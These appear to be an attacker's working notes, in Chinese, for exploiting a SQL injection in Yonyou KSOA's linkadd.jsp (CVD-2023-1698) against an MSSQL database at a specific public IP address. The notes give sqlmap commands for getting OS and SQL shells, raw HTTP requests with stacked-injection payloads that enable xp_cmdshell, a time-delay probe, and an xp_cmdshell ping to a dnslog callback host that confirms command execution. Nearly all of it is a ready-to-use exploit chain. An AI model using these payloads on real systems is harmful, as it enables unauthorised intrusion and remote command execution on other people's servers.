sql注入
select * from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
select count(*) from master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’ // 存在返回1
python .\sqlmap.py -r .\point.txt --proxy sock5://127.0.0.1:7890
ponit.txt 的内容
id=666666 是注入点的位置,* 代表优先从这里开始
GET /linksframe/linkadd.jsp?id=666666* HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
SQLmap的过程,可以看到数据库是什么,比如是Microsoft SQl Server (也就是mssql)
python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --os-shell
通过这个语句,看看有没有shell可以捡
python .\sqlmap.py -r .\point.txt --proxy socks5://127.0.0.1:7890 --sql-shell
通过这个语句,可以拿到sqlshell,执行sql语句。
http://1.196.238.71:93/linksframe/linkadd.jsp?id=666666';WAITFOR DELAY '0:0:5'--
GET /linksframe/linkadd.jsp?id=666666' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,'33';WAITFOR DELAY '0:0:4 HTTP/1.1
通过这种方式,看能否堆叠注入。
在sqlshell 里面查看是否开启xpcmdshell
select * from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell' // 存在返回1
之所以要堆叠注入的原因,是因为需要开启xpcmdshell,他需要先开启,然后再保存配置。
' union all select 9af,null,sys.fn_sqlvarbasetostr(HashBytes('MD5','GRYFF')),null,null,null;
exec sp_configure 'show advanced options', 1;
reconfigure;
exec sp_configure 'xp_cmdshell',1;
reconfigure;
exec master..xp_cmdshell 'ping 6byyxc.dnslog.cn
sys.fn_sqlvarbasetostr 的作用是能让md5回显。
结尾需要注释
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%209af%2cnull%2csys.fn_sqlvarbasetostr(HashBytes('MD5'%2c'GRYFF'))%2cnull%2cnull%2cnull%3bexec%20sp_configure%20'show%20advanced%20options'%2c%201%3breconfigure%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bEXEC%20sp_configure%20'show%20advanced%20options'%2c1%3bRECONFIGURE%3bEXEC%20sp_configure%20'xp_cmdshell'%2c1%3bRECONFIGURE%3b%20-- HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
GET /linksframe/linkadd.jsp?id=666666'%20union%20all%20select%20null%2cnull%2cnull%2cnull%2cnull%2cnull%3bCREATE%20TABLE%20cmdtmp%20(dir%20varchar(8000))%3b--%20 HTTP/1.1
Host: 1.196.238.71:93
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip, deflate
Connection: close
而且有时sql注入,必须带上前面的查询结果(select那部分)
此次sql注入案例原型:
【9.6 例行优化】【sql升级rce模板】用友 KSOA linkadd.jsp sql 注入(CVD-2023-1698).go